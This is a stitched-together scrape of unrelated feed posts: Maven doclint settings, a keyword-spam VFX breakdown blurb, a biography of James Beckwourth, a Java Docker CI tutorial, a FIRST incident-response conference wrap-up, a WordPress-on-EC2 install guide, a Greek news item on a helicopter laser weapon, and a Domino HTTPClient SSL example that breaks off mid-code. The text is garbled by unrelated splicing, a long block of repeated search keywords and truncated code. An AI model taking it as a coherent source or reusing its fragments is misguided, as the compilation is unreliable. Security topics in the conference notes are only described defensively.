Except that recently, we had to access a WebService in SOAP. So I used the tool provided with the JDK: wsimport. Not a bad tool, it really provides nice javadoc. But doclint would just not like it. It does not like <p> tags without their matching close tag. It would not like the <pre> tags, or rather what would go right after it, which is something that browsers should not interpret. In short, doclint makes an other JDK tool to fail at its job. So I resorted to Stephen Colebourne's advice: I switched off doclint altogether. In our maven configuration, it looks like that:

 <plugins>
    <plugin>
      <groupId>org.apache.maven.plugins</groupId>
      <artifactId>maven-javadoc-plugin</artifactId>
      <configuration>
        <additionalparam>-Xdoclint:none</additionalparam>
      </configuration>
    </plugin>
  </plugins>


          A Monster Calls Vfx Breakdown   

A Monster Calls Breakdown, Making of A Monster Calls, A Monster Calls – Design Making Of, A Monster Calls VFX Breakdown, A Monster Calls Behind The Scenes, Making of A Monster Calls, A Monster Calls VFX Breakdown, Making of A Monster Calls, El Ranchito Imagen Digital, A Monster Calls VFX Breakdown, Making of A Monster Calls, El Ranchito Imagen Digital – A Monster Calls Making-of, A Monster Calls – VFX Breakdown by El Ranchito Imagen Digital, A Monster Calls – VFX Breakdown, A Monster Calls VFX Breakdown, A Monster Calls VFX Breakdown, El Ranchito Imagen Digital A Monster Calls VFX Breakdowns, Making of A Monster Calls, A Monster Calls – El Ranchito Imagen Digital VFX Making Of, Making of A Monster Calls, A Monster Calls – Making of (Breakdown), 3d, El Ranchito Imagen Digital, 3d animation, cg, computer graphics, breakdown, animation, making of, El Ranchito Imagen Digital, Making of A Monster Calls, A Monster Calls VFX Breakdown, A Monster Calls – Behind The Visual Effects, A Monster Calls VFX Breakdown, Swiss International, A Monster Calls VFX Breakdown, Swiss International A Monster Calls VFX Breakdown Reel, A Monster Calls VFX Breakdown, A Monster Calls – Swiss International VFX reel, Making of A Monster Calls, Making of A Monster Calls, Swiss International ‘A Monster Calls’ – The Making Of, Making of Swiss International A Monster Calls, A Monster Calls VFX Breakdown, A Monster Calls_ROD-2, A Monster Calls CGI Breakdown, A Monster Calls Film Progression Reel, A Monster Calls – Behind the Scenes, Making of A Monster Calls, A Monster Calls, A Monster Calls VFX Breakdown, Making of A Monster Calls, The Making Of A Monster Calls, El Ranchito Imagen Digital, A Monster Calls Vfx Breakdown, A Monster Calls – Making of, Making of A Monster Calls, Making of A Monster Calls, Behind the Scenes: A Monster Calls, Making of A Monster Calls, Behind the Scenes: A Monster Calls, Making of A Monster Calls, Behind the Scenes: A Monster Calls, El Ranchito Imagen Digital “A Monster Calls” VFX breakdown ’ 2016, A Monster Calls VFX Breakdown, Making of A Monster Calls, Making of A Monster Calls, A Monster Calls, A Monster Calls – VFX Breakdown by El Ranchito Imagen Digital, A Monster Calls Animation Breakdown, A Monster Calls cgi, A Monster Calls making, A Monster Calls Making Of, A Monster Calls Reel Breakdown, A Monster Calls vfx, A Monster Calls VFX Breakdown, A Monster Calls VfxBreakdown, After Effects, Baudelaire children, Baudelaire orphans, Behind the Scenes: O2 ‘A Monster Calls’, brakdown, BTS: A Monster Calls, CGI, Waitrose, Behind the scenes, making of, visual effects, vfx, CG, CGI, 2D, 3D, animation, Advertising, Commercial, character design, characters, creature, vfx breakdown, A Monster Calls VFX Breakdown

A Monster Calls Vfx Breakdown El Ranchito Imagen Digital presents A Monster Calls Vfx Breakdown. Director: J. A. Bayona Producer: Apaches Entertainment, La Trini and Telecinco A Monster Calls Breakdown, Making of A Monster Calls, A Monster Calls – Design Making Of, A Monster Calls VFX Breakdown, A Monster Calls Behind The Scenes, Making of […]
          Black Past ― Beckwourth, James Pierson (c. 1805 - 1866)   
If any man of any color attained the ranks of legendary in the American West, it was James Beckwourth
 

 
(BlackPast.org) If any attest to his fame is necessary, one only needs to read the description under the accompanying lithograph and note that even in France, his fame preceded him. Coming to St. Louis, Missouri in the mid-1800's as the mulatto slave of his blacksmith father (who, according to the laws of the time actually owned his own son), the young man quickly set out to conquer the West as a mountain man. For at least two decades he roamed the mountains and plains of the West and Northwest as part of the French fur trade, colleague of men like Jim Bridger and Kit Carson.

According to his autobiography, he spent most of his adult life with Apaches, Crows and Sacs, who gave him the appellation Dark Sky. During these years he states that he fought in the
Mexican War, led the Crows in battles against Blackfeet Indians, helped arranged a peace treaty with the Apaches, and hunted elk, buffalo and bear all the while as he traveled from Kansas to California. Near Lake Tahoe he discovered a mountain pass that bears his name to this day.


 At the apex of his career he was named A Chief of All Chiefs by the Crow Nation. He married at different times to four women: two Native Americans, a Latina, and an African American woman. By 1860 he moved to the young town of Denver,
Colorado Territory where he owned a saloon where he drew patrons with his gregarious tall tales about a riotous life spent among Indians and the mountains. Records of his death are unclear. One has him returning to the Crows, who begged him to again become their leader. In this account he refused and committed ritual suicide so that he might die among his people. Others say that he passed on peacefully as an old man in Denver.

Sources:James P. Beckwourth (Ed. T.D. Bonner), The Life and Adventures of James T. Beckwourth: Mountaineer, Scout and Pioneer (New York, Harper and Brothers, 1856);
John W. Ravage, Black Pioneers: Images of the Black Experience on the North American Frontier (Salt Lake City: University of Utah Press, 1997, 2002).


*BlackPast.org is committed to providing free and unrestricted information on African American history. We need your support, however, to continue to provide the quality historical content our thousands of daily visitors to the website have come to expect.
As an independent non-profit organization, BlackPast.org is not financially supported by any university or governmental agency. We need your help to continue to provide this content of over 10,000 pages to a world-wide audience.

Please make a gift to BlackPast.org. Your financial contribution* will support our efforts to share a history that must be remembered and reclaimed.
 
http://www.blackpast.org/donate-blackpast-org
 
 

          Jan De Dobbeleer: Java two dot oh   

I have to admit it, I’m not the biggest fan of Java. But, when they asked me to prepare a talk for 1st grade students who are currently learning to code using Java, I decided it was time to challenge some of my prejudices. As I selected continuous integration as the topic of choice, I started out by looking at all available tools to quickly setup a reliable Java project. Having played with dotnet core the past months, I was looking for a tool that could do a bit of the same. A straightforward CLI interface that can create a project out of the box to mess around with. Maven provided to be of little help, but gradle turned out to be exactly what I was looking for. Great, I gained some faith.

It’s only while creating my slides and looking for tooling that can be used specifically for Java, that I had an epiphany. What if it is possible to create an entire developer environment using docker? So no need for local dependencies like linting tools or gradle. No need to mess with an IDE to get everything set up. And, no more “it works on my machine”. The power and advantages of a CI tool, straight onto your own computer.

A quick search on Google points us to gradle’s own Alpine linux container. It comes with JDK8 out of the box, exactly what we’re looking for. You can create a new Java application with a single command:

docker run -v=$(pwd):/app --workdir=/app gradle:alpine gradle init --type java-application

This starts a container, creates a volume linked to your current working directory and initializes a brand new Java application using gradle init --type java-application. As I don’t feel like typing those commands all the time, I created a makefile to help me build and debug the app. Yes, you can debug the app while it’s running in the container. Java supports remote debugging out of the box. Any modern IDE that supports Java, has support for remote debugging. Simply run the make debug command and attach to the remote debugging session on port 1044.

ROOT_DIR:=$(shell dirname $(realpath $(lastword $(MAKEFILE_LIST))))

build:
    docker run --rm -v=${ROOT_DIR}:/app --workdir=/app gradle:alpine gradle clean build

debug: build
    docker run --rm -v=${ROOT_DIR}:/app -p 1044:1044 --workdir=/app gradle:alpine java -classpath /app/build/classes/main -verbose -agentlib:jdwp=transport=dt_socket,server=y, suspend=y,address=1044 App

Now that we have a codebase that uses the same tools to build, run and debug, we need to bring our coding standard to a higher level. First off we need a linting tool. Traditionally, people look at checkstyle when it comes to Java. And while that could be fine for you, I found that tool rather annoying to set up. XML is not something I like to mess with other than to create UI, so seeing this verbose config set me back. There simply wasn’t time to look at that. Even with the 2 different style guides, it would still require a bit of tweaking to get everything right and make the build pass.

As it turns out, there are other tools out there which feel a bit more 21st century. One of those is coala. Now, coala can be used as a linting tool on a multitude of languages, not just Java, so definetly take a look at it, even if you’re not into Java yourself. It’s a Python based tool which has a lot of neat little bears who can do things. The config is a breeze as it’s a yaml file, and they provide a container so you can run the checks in an isolated environment. All in all, exactly what we’re looking for.

Let’s extend our makefile to run coala:

docker run --rm -v=${ROOT_DIR}:/app --workdir=/app coala/base coala --ci -V

I made sure to enable verbose logging, simply to be able to illustrate the tool to students. Feel free to disable that. You can easily control what coala needs to verify by creating a .coafile in the root of the repository. One of the major advantages to use coala over anything else, is that it can do both simple linting checks as well as full on static code analysis.

Let’s have a look at the settings I used to illustrate its power.

[Default]
files = src/**/*.java
language = java

[SPACES]
bears = SpaceConsistencyBear
use_spaces = True

[TODOS]
bears = KeywordBear

[PMD]
bears = JavaPMDBear
check_optimizations = true
check_naming = false

You can start out by defining a default. In my case, I’m telling coala to look for .java files which are written using Java. There are three bears being used. SpaceConsistencyBear, who will check for spaces and not tabs. KeywordBear, who dislikes //TODO comments in code, and JavaPMDBear, who invokes PMD to do some static code analysis. In the example, I had to set check_naming = false otherwise I would have lost a lot of time fixing those error (mostly due to my proper lack of Java knowledge).

Now, whenever I want to validate my code and enforce certain rules for me and my team, I can use coala to achieve this. Simply run make validate and it will start the container and invoke coala. At this point, we can setup the CI logic in our makefile by simply combining the two commands.

ci: validate build

The command make ci will invoke coala and if all goes well, use gradle to build and test the file. As a cherry on top, I also included test coverage. Using Jacoco, you can easily setup rules to fail the build when the coverage goes below a certain threshold. The tool is integrated directly into gradle and provides everything you need out of the box, simply add the following lines to your build.gradle file. This way, the build will fail if the coverage drops below 50%.

apply plugin: 'jacoco'

jacocoTestReport {
    reports {
        xml.enabled true
        html.enabled true
    }
}

jacocoTestCoverageVerification {
    violationRules {
        rule {
            limit {
                minimum = 0.5
            }
        }
    }
}

check.dependsOn jacocoTestCoverageVerifica

Make sure to edit the build step in the makefile to also include Jacoco.

build:
    docker run --rm -v=${ROOT_DIR}:/app --workdir=/app gradle:alpine gradle clean build jacocoTestReport

The only thing we still need to do is select a CI service of choice. I made sure to add examples for both circleci and travis, each of which only require docker and an override to use our makefile instead of auto-detecting gradle and running that. The way we set up this project allows us to easily switch CI when we need to, which is not all that strange given the lifecycle of a software project. The tools we choose when we start out, might be selected to fit the needs at the time of creation, but nothing assures us that will stay true forever. Designing for change is not something we need to do in code alone, it has a direct impact on everything, so expect things to change and your assumptions to be challenged.

Have a look at the source code for all the info and the build files for the two services. Enjoy!

Source code


          Xavier Mertens: FIRST TC Amsterdam 2017 Wrap-Up   

Here is my quick wrap-up of the FIRST Technical Colloquium hosted by Cisco in Amsterdam. This is my first participation to a FIRST event. FIRST is an organization helping in incident response as stated on their website:

FIRST is a premier organization and recognized global leader in incident response. Membership in FIRST enables incident response teams to more effectively respond to security incidents by providing access to best practices, tools, and trusted communication with member teams.

The event was organized at Cisco office. Monday was dedicated to a training about incident response and the two next days were dedicated to presentations. All of them focussing on the defence side (“blue team”). Here are a few notes about interesting stuff that I learned.

The first day started with two guys from Facebook: Eric Water @ Matt Moren. They presented the solution developed internally at Facebook to solve the problem of capturing network traffic: “PCAP don’t scale”. In fact, with their solution, it scales! To investigate incidents, PCAPs are often the gold mine. They contain many IOC’s but they also introduce challenges: the disk space, the retention policy, the growing network throughput. When vendors’ solutions don’t fit, it’s time to built your own solution. Ok, only big organizations like Facebook have resources to do this but it’s quite fun. The solution they developed can be seen as a service: “PCAP as a Service”. They started by building the right hardware for sensors and added a cool software layer on top of it. Once collected, interesting PCAPs are analyzed using the Cloudshark service. They explained how they reached top performances by mixing NFS and their GlusterFS solution. Really a cool solution if you have multi-gigabits networks to tap!

The next presentation focused on “internal network monitoring and anomaly detection through host clustering” by Thomas Atterna from TNO. The idea behind this talk was to explain how to monitor also internal traffic. Indeed, in many cases, organizations still focus on the perimeter but internal traffic is also important. We can detect proxies, rogue servers, C2, people trying to pivot, etc. The talk explained how to build clusters of hosts. A cluster of hosts is a group of devices that have the same behaviour like mail servers, database servers, … Then to determine “normal” behaviour per cluster and observe when individual hosts deviate. Clusters are based on the behaviour (the amount of traffic, the number of flows, protocols, …). The model is useful when your network is quite close and stable but much more difficult to implement in an “open” environment (like universities networks).
Then Davide Carnali made a nice review of the Nigerian cybercrime landscape. He explained in details how they prepare their attacks, how they steal credentials, how they deploy the attacking platform (RDP, RAT, VPN, etc). The second part was a step-by-step explanation how they abuse companies to steal (sometimes a lot!) of money. An interesting fact reported by Davide: the time required between the compromisation of a new host (to drop malicious payload) and the generation of new maldocs pointing to this host is only… 3 hours!
The next presentation was performed by Gal Bitensky ( Minerva):  “Vaccination: An Anti-Honeypot Approach”. Gal (re-)explained what the purpose of a honeypot and how they can be defeated. Then, he presented a nice review of ways used by attackers to detect sandboxes. Basically, when a malware detects something “suspicious” (read: which makes it think that it is running in a sandbox), it will just silently exit. Gal had the idea to create a script which creates plenty of artefacts on a Windows system to defeat malware. His tool has been released here.
Paul Alderson (FireEye) presented “Injection without needles: A detailed look at the data being injected into our web browsers”. Basically, it was a huge review of 18 months of web-­inject and other configuration data gathered from several botnets. Nothing really exciting.
The next talk was more interesting… Back to the roots: SWITCH presented their DNS Firewall solution. This is a service they provide not to their members. It is based on DNS RPZ. The idea was to provide the following features:
  • Prevention
  • Detection
  • Awareness

Indeed, when a DNS request is blocked, the user is redirected to a landing page which gives more details about the problem. Note that this can have a collateral issue like blocking a complete domain (and not only specific URLs). This is a great security control to deploy. Note that RPZ support is implemented in many solutions, especially Bind 9.

Finally, the first day ended with a presentation by Tatsuya Ihica from Recruit CSIRT: “Let your CSIRT do malware analysis”. It was a complete review of the platform that they deployed to perform more efficient automatic malware analysis. The project is based on Cuckoo that was heavily modified to match their new requirements.

The second day started with an introduction to the FIRST organization made by Aaron Kaplan, one of the board members. I liked the quote given by Aaron:

If country A does not talk to country B because of ‘cyber’, then a criminal can hide in two countries

Then, the first talk was really interesting: Chris Hall presented “Intelligence Collection Techniques“. After explaining the different sources where intelligence can be collected (open sources, sinkholes, …), he reviewed a serie of tools that he developed to help in the automation of these tasks. His tools addresses:
  • Using the Google API, VT API
  • Paste websites (like pastebin.com)
  • YARA rules
  • DNS typosquatting
  • Whois queries

All the tools are available here. A very nice talk with tips & tricks that you can use immediately in your organization.

The next talk was presented by a Cisco guy, Sunil Amin: “Security Analytics with Network Flows”. Netflow isn’t a new technology. Initially developed by Cisco, they are today a lot of version and forks. Based on the definition of a “flow”: “A layer 3 IP communication between two endpoints during some time period”, we got a review the Netflow. Netflow is valuable to increase the visibility of what’s happening on your networks but it has also some specific points that must be addressed before performing analysis. ex: de-duplication flows. They are many use cases where net flows are useful:
  • Discover RFC1918 address space
  • Discover internal services
  • Look for blacklisted services
  • Reveal reconnaissance
  • Bad behaviours
  • Compromised hosts, pivot
    • HTTP connection to external host
    • SSH reverse shell
    • Port scanning port 445 / 139
I would expect a real case where net flow was used to discover something juicy. The talk ended with a review of tools available to process net flow data: SiLK, nfdump, ntop but log management can also be used like the ELK stack or Apache Spot. Nothing really new but a good reminder.
Then, Joel Snape from BT presented “Discovering (and fixing!) vulnerable systems at scale“. BT, as a major player on the Internet, is facing many issues with compromized hosts (from customers to its own resources). Joel explained the workflow and tools they deployed to help in this huge task. It is based on the following circle: Introduction,  data collection, exploration and remediation (the hardest part!).
I like the description of their “CERT dropbox” which can be deployed at any place on the network to perform the following tasks:
  • Telemetry collection
  • Data exfiltration
  • Network exploration
  • Vulnerability/discovery scanning
An interesting remark from the audience: ISP don’t have only to protect their customers from the wild Internet but also the Internet from their (bad) customers!
Feike Hacqueboard, from TrendMicro, explained:  “How political motivated threat actors attack“. He reviewed some famous stories of compromised organizations (like the French channel TV5) then reviewed the activity of some interesting groups like C-Major or Pawn Storm. A nice review of the Yahoo! OAuth abuse was performed as well as the tab-nabbing attack against OWA services.
Jose Enrique Hernandez (Zenedge) presented “Lessons learned in fighting Targeted Bot Attacks“. After a quick review of what bots are (they are not always malicious – think about the Google crawler bot), he reviewed different techniques to protect web resources from bots and why they often fail, like the JavaScript challenge or the Cloudflare bypass. These are “silent challenges”. Loud challenges are, by examples, CAPTCHA’s. Then Jose explained how to build a good solution to protect your resources:
  • You need a reverse proxy (to be able to change quests on the fly)
  • LUA hooks
  • State db for concurrency
  • Load balancer for scalability
  • fingerprintjs2 / JS Challenge

Finally, two other Cisco guys, Steve McKinney & Eddie Allan presented “Leveraging Event Streaming and Large Scale Analysis to Protect Cisco“. CIsco is collecting a huge amount of data on a daily basis (they speak in Terabytes!). As a Splunk user, they are facing an issue with the indexing licence. To index all these data, they should have extra licenses (and pay a lot of money). They explained how to “pre-process” the data before sending them to Splunk to reduce the noise and the amount of data to index.
The idea is to pub a “black box” between the collectors and Splunk. They explained what’s in this black box with some use cases:
  • WSA logs (350M+ events / day)
  • Passive DNS (7.5TB / day)
  • Users identification
  • osquery data

Some useful tips that gave and that are valid for any log management platform:

  • Don’t assume your data is well-formed and complete
  • Don’t assume your data is always flowing
  • Don’t collect all the things at once
  • Share!

Two intense days full of useful information and tips to better defend your networks and/or collect intelligence. The slides should be published soon.

[The post FIRST TC Amsterdam 2017 Wrap-Up has been first published on /dev/random]


          Install WordPress on AWS EC2 Instance   
WordPress and AWS
After successful completion of first and second step i.e. creating an EC2 instanceand connecting to EC2 instance in AWS using PuTTY and Terminal respectively. Further moving ahead, it is time to install Apache, PHP, MySQL to run WordPress on an EC2 instance. If you are not familiar with command line / Linux commands just run these commands in same order.

NOTE: This instruction is for Amazon Linux and will not work if you are trying different machine image like Ubuntu or Windows Server.

Connect to your instance via PuTTY  (Windows) / Terminal (Mac OS) / Bash (Linux OS)

Just to make sure everything is up to date
sudo yum -y update

If you want, you may directly switch from ‘ec2-user’ user to root using sudo su command.

Install multiple software packages:
sudo yum install -y httpd24 php70 mysql56-server php70-mysqlnd

Start Apache Server:
sudo service httpd start

Create a page to check your PHP installation

a) vi test.php
b) Type i to start the insert mode
c) Type <?php phpinfo() ?>
d) Hit escape button and type :wq, now hit enter to exit
e) Open a browser and http://ec2-xxx-xxx-xxx-xxx.us-west-1.compute.amazonaws.com/test.php (use you public IP DNS followed by /test.php)

If you see a phpinfo page then you are good to move forward, otherwise you may want to start over.

Delete the test.php file as it is for the information only and you definitely don’t want to give away sensitive information about your server:

rm -f /var/www/html/test.php

Secure Start SQL service

Start MySQL service and run secure installation
sudo service mysqld start
sudo mysql_secure_installation

MySQL_Secure_installation
When prompted, enter a password for the root account. By default, the root account does not have a password set, so press Enter.

Type Y to set a password, and enter a secure password twice
1) Remove anonymous users? [Y/n] Y
2) Disallow root login remotely? [Y/n] Y
3) Remove test database and access to it? [Y/n] Y
4) Reload privilege tables now? [Y/n] Y

Restart MySQL to pick up the changes:
sudo service mysqld restart

Login into MySQL and Create a database for WordPress

Log in to the MySQL server as the root user and enter your MySQL root password when prompted
mysql -u root –p

Create a user name and password for your MySQL database.
CREATE USER 'aksgeek'@'localhost' IDENTIFIED BY 'aksgeekpassword';
Replace ‘aksgeek’ with your WordPress username and ‘aksgeekpassword’ with your strong password.


Create a database for WordPress:

 Create_database_for_wordpress


CREATE DATABASE `wordpressdb`;

(you can create a database with any name)
GRANT ALL PRIVILEGES ON `wordpressdb`.* TO "aksgeek"@"localhost";
FLUSH PRIVILEGES;
exit

Install WordPress
cd /var/www/html
wget https://wordpress.org/latest.tar.gz
tar -xzf latest.tar.gz
cd wordpress/
mv wp-config-sample.php wp-config.php
nano wp-config.php

 edit_wp-config
Start editing wp-config.php. (user arrow keys to move around)

define('DB_NAME', 'wordpressdb');
define('DB_USER', 'aksgeek');
define('DB_PASSWORD', 'aksgeekpassword');
define('DB_HOST', 'localhost');

Visit https://api.wordpress.org/secret-key/1.1/salt/ to randomly generate a set of key values that you can copy and paste into your wp-config.php file.
Ctrl + X
Save modified buffer (ANSWERING "No" WILL DESTROY CHANGES) ? Y
File Name to Write [DOS Format]: wp-config.php  hit Enter.

Move your WordPress installation to root or in subdirectory / folder

You may want to run your WordPress blog from root like your_public_dns.amazonaws.com/)  then
mv * /var/www/html/

Or

Most of you want to install it in a subdirectory or folder (for example, your_public_dns.amazonaws.com/blog, then
mkdir /var/www/html/blog
mv * /var/www/html/blog

To allow WordPress to use permalinks
sudo nano /etc/httpd/conf/httpd.conf

<Directory "/var/www/html">
    #
    # Possible values for the Options directive are "None", "All",
    # or any combination of:
    #   Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews
    #
    # Note that "MultiViews" must be named *explicitly* --- "Options All"
    # doesn't give it to you.
    #
    # The Options directive is both complicated and important.  Please see
    # http://httpd.apache.org/docs/2.4/mod/core.html#options
    # for more information.
    #
    Options Indexes FollowSymLinks

    #
    # AllowOverride controls what directives may be placed in .htaccess files.
    # It can be "All", "None", or any combination of the keywords:
    #   Options FileInfo AuthConfig Limit
    #
    AllowOverride None

    #
    # Controls who can get stuff from this server.
    #
    Require all granted
</Directory>

Find the section that starts with <Directory "/var/www/html"> and change the AllowOverride None line to AllowOverride All.

To ensure that the httpd and mysqld services start at every system boot
sudo chkconfig httpd on
sudo chkconfig mysqld on

Open a web browser and enter the URL of your WordPress blog, you should see the WordPress installation screen

Example for root installation:  http://ec2-xx-xxx-xxx-xxx-us-west-1.compute.amazonaws.com

or

for subdirectory / folder (blog): http://ec2-xx-xxx-xxx-xxx-us-west-1.compute.amazonaws.com/blog.

Wordpress_installation_finished
Enter your site name, username, password and email address and hit submit.



Congratulations!! You are running WordPress blog on Amazon Web Services (AWS) EC2 instance.

Troubleshooting

Having trouble updating and downloading themes/plugin in WordPress blog as it is asking for FTP credentials then run this command:
sudo chown -R apache:apache /var/www/html

          Steps for configuring Laravel on Apache HTTP Server   
While most people develop Laravel applications on the excellent Homestead platform, which uses Nginx for the HTTP server, I still prefer to use Apache 2 HTTP server, because it is most widely supported, especially on shared hosting. Accordingly, I frequently set up Linux hosts, such as Vagrant boxes, to run Laravel with Apache. Here are … Continue reading Steps for configuring Laravel on Apache HTTP Server
          Fix ‘403 Forbidden’ error on Apache 2.4 HTTP server in Ubuntu   
In the latest versions (specifically version 2.4.3 and above) of the Apache 2.4 HTTP server, on a new installation, you may receive the ‘403 Forbidden’ HTTP error when attempting display your site.  To increase security, the Apache developers changed the default configuration to block all requests.  To fix this, you must explicitly grant permissions via … Continue reading Fix ‘403 Forbidden’ error on Apache 2.4 HTTP server in Ubuntu
          Install latest version of Adminer MySQL administration tool on Ubuntu Linux   
Adminer is a lightweight, PHP-based MySQL administration tool that is a great alternative to PHPMyAdmin. It comes as a single file and can easily be installed globally on your Ubuntu Linux box, including a Vagrant box. The prerequisites for installing and using Adminer are PHP, MySQL, and Apache, the so-called LAMP stack. To install them … Continue reading Install latest version of Adminer MySQL administration tool on Ubuntu Linux
          CentOS7 + Apache2.4 + PHP7.1 環境を構築   

はじめに お久しぶりです。kenjiです。 一番よく利用されると思う CentOS7.3、Apache2.4、PHP7.1 でのインストールを紹介したいと思います。 yumコマンドを用いて目標時間10分ほどで環境を作成し...
          Επιτυχημένη η πρώτη βολή όπλου λέιζερ από επιθετικό ελικόπτερο [βίντεο]    

Με επιτυχία στέφθηκε η πρώτη δοκιμή από τις αμερικανικές ένοπλες δυνάμεις ενός όπλου λέιζερ υψηλής ισχύος που είχε τοποθετηθεί σε επιθετικό ελικόπτερο Apache AH-64.

Στην επίδειξη, που έγινε στο πεδίο δοκιμών White Sands του Νέου Μεξικού, το όπλο λέιζερ εντόπισε, στόχευσε και έπληξε στόχο εδάφους σε απόσταση περίπου 1,4 χλμ.
Το όπλο, που ανέπτυξε η εταιρεία Raytheon, είναι σχεδόν αθόρυβο και οι βολές του σχεδόν αόρατες, γεγονός που καθιστά ιδιαίτερα δύσκολη την ανίχνευσή του από τους εχθρούς και μπορεί στο εγγύς μέλλον να χρησιμοποιηθεί στα πεδία των μαχών.
Συστήματα λέιζερ χρησιμοποιούντα στα ελικόπτερα Apache από το 1984, αλλά ήταν χαμηλής ισχύος και χρησίμευαν μόνο για την καθοδήγηση πυραύλων αέρος-εδάφους. Ενώ αυτή ήταν, σύμφωνα με τη Raytheon, η πρώτη φορά που ένα πλήρως ενσωματωμένο σύστημα λέιζερ έπληξε με επιτυχία στατικό στόχο από ελικόπτερο, σε μια ποικιλία υψομέτρων, ταχυτήτων και φάσεων πτήσης.

Τα λέιζερ αυτά είναι ιδιαίτερα ακριβή επειδή, σε αντίθεση με τα συμβατικά βλήματα και τις σφαίρες, βάλλουν σε ευθεία γραμμή και είναι αρκετά ισχυρά για να καταστρέφουν στόχους.
Η εταιρεία χρησιμοποίησε έναν ηλεκτροοπτικό υπέρυθρο αισθητήρα -παραλλαγή του πολυ-φασματικού συστήματος στόχευσης (Multi-Spectral Targeting System). Λέει μάλιστα ότι η ισχύς της ακτίνας λέιζερ μπορεί να προσαρμοστεί σε κάθε υλικό και ότι μπορεί να εξουδετερώσει, χωρίς να σκοτώσει, ανθρώπινους στόχους.

Στη διάρκεια της δοκιμής εξουδετερώθηκαν πύραυλοι Κρουζ, οβίδες και άλλα βλήματα, ανέφερε η εταιρεία, επισημαίνοντας ότι «σε αντίθεση με τα συμβατικά όπλα, τα λέιζερ δεν ξεμένουν από σφαίρες».
Ωστοσο, χρησιμοποιούν πολλή ενέργεια και προς το παρόν δεν μπορούν να χρησιμοποιηθούν σε συνθήκες ομίχλης, καπνού, ή εναντίον στόχων με ειδική anti-laser επίστρωση.
Οι αμερικανικές ένοπλες δυνάμεις στρέφονται ολοένα και περισσότερο στην τεχνολογία λέιζερ και ήδη χρησιμοποιούν τέτοια όπλα για να καταρρίπτουν εχθρικούς πυραύλους και μη επανδρωμένα τηλεκατευθυνόμενα αεροσκάφη.
Νωρίτερα φέτος, μονάδες του αμερικανικού πεζικού χρησιμοποίησαν για πρώτη φορά όπλα λέιζερ στη διάρκεια ασκήσεων, καταρρίπτοντας 50 drones.

Πηγή: www.iefimerida.gr

          Mastering PHP 7   

Effective, readable, and robust codes in PHP About This Book Leverage the newest tools available in PHP 7 to build scalable applications Embrace serverless architecture and the reactive programming paradigm, which are the latest additions to the PHP ecosystem Explore dependency injection and implement design patterns to write elegant code Who This Book Is For This book is for intermediate level developers who want to become a master of PHP. Basic knowledge of PHP is required across areas such as basic syntax, types, variables, constants, expressions, operators, control structures, and functions. What You Will Learn Grasp the current state of PHP language and the PHP standards Effectively implement logging and error handling during development Build services through SOAP and REST and Apache Trift Get to know the benefits of serverless architecture Understand the basic principles of reactive programming to write asynchronous code Practically implement several important design patterns Write efficient code by executing dependency injection See the working of all magic methods Handle the command-line area tools and processes Control the development process with proper debugging and profiling In Detail PHP is a server-side scripting language that is widely used for web development. With this book, you will get a deep understanding of the advanced programming concepts in PHP and how to apply it practically The book starts by unveiling the new features of PHP 7 and walks you through several important standards set by PHP Framework Interop Group (PHP-FIG). You’ll see, in detail, the working of all magic methods, and the importance of effective PHP OOP concepts, which will enable you to write effective PHP code. You will find out how to implement design patterns and resolve dependencies to make your code base more elegant and readable. You will also build web services alongside microservices architecture, interact with databases, and work around third-party packages to enrich applications. This book delves into the details of PHP performance optimization. You will learn about serverless architecture and the reactive programming paradigm that found its way in the PHP ecosystem. The book also explores the best ways of testing your code, debugging, tracing, profiling, and deploying your PHP application. By the end of the book, you will be able to create readable, reliable, and robust applications in PHP to meet modern day requirements in the software industry. Style and approach This is a comprehensive, step-by-step practical guide to developing scalable applications using PHP 7.1 Downloading the example code for this book. You can download the example code files for all Packt books you have purchased from your account at http://www.PacktPub.com . If you purchased this book elsewhere, you can visit http://www.PacktPub.com/support and register to have the code file.


          Ben 10 Overkill Apache   
Acest lucru este cu siguranţă nejustificată. Vedea cât de mult distrugerea poate provoca înainte de daune luaţi se termină jocul.
          Read WhatsApp messages on Server and Acknowledge Receipt by hemantrachh   
Create a Server Application which can read & store WhatsApp message sent to Server (Mobile Number Receiver) and Send a configured acknowledgement (on WhatsApp) back to Sender (Mobile Number). (Budget: ₹1500 - ₹12500 INR, Jobs: Apache, Java, Ubuntu, VPS, Web Services)
          Read WhatsApp messages on Server and Acknowledge Receipt by hemantrachh   
Create a Server Application which can read & store WhatsApp message sent to Server (Mobile Number Receiver) and Send a configured acknowledgement (on WhatsApp) back to Sender (Mobile Number). (Budget: ₹1500 - ₹12500 INR, Jobs: Apache, Java, Ubuntu, VPS, Web Services)
          (Senior) Software Ingenieur (voor de webtoepassingen in een LAMP omgeving ) - KU Leuven - Leuven   
Voor de Directie ICTS (Informatie & Communicatie Technologie & Systemen) zoeken wij een (Sr.) Software ingenieur voor de webtoepassingen in een LAMP omgeving De webomgeving van de KU Leuven bestaat uit de corporate website van de KU Leuven, websites van verschillende groepen en tal van eigen en gehoste toepassingen. Technisch bestaat de omgeving uit verschillende componenten. Naast een Web-CMS (Plone) staat een uitgebreide LAMP omgeving (Linux, Apache, MySQL, PHP). Binnen...
          Creating ltpa for domino connection from php/apache   
already many documents about ltpa - domino 1) User logs into Apache/php server which is authenticated via ldap (domino). 2) links to domino site and need to logon ( need to use single sign on) create a valid domino token for the connection. Anyone having experience or tips and trics ? thanxs
          Doing SSL from Domino using HTTPClient   

 

For a customer we had a project that had to send SOAP messages over the internet so we had to look into HTTPS or SSL. Having done this back in the Java 1.1.8 (R5) days where you had to mess with the internals of Domino's JAR files I was a little worried.

But some googleing did show that some progress has been made(!). The Jakarta commons HTTP Client project comes to the rescue. http://jakarta.apache.org/httpcomponents/httpclient-3.x/index.html
It has been around for some time but that is usually a good thing. The latest stable version is 3.1.
It does all the things you could ask. Well it did not do proxying with the SOCKS protocol. But that is available in the 4 version - which is not stable yet.

Here is a very simple example just to show how simple it is to get started.
You need to put the files:
commons-codec-1.3.jar, commons-httpclient-3.1.jar, commons-logging-1.1.jar in your "\jvm\lib\ext" directory on your client and server.

Simple Agent example:
-------- cut here --------




import lotus.domino.AgentBase;
import lotus.domino.AgentContext;
import lotus.domino.Session;
import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.methods.*;

public class JavaAgent extends AgentBase {
 public void NotesMain() {
  try {
   Session session = getSession();
   AgentContext agentContext = session.getAgentContext();
   HttpClient client = new HttpClient();
   GetMethod method = new GetMethod("https://www.verisign.com/");
   try {
    int status = client.executeMethod( method );
    System.out.println(status + "\n" + method.getResponseBodyAsString());
   } finally {
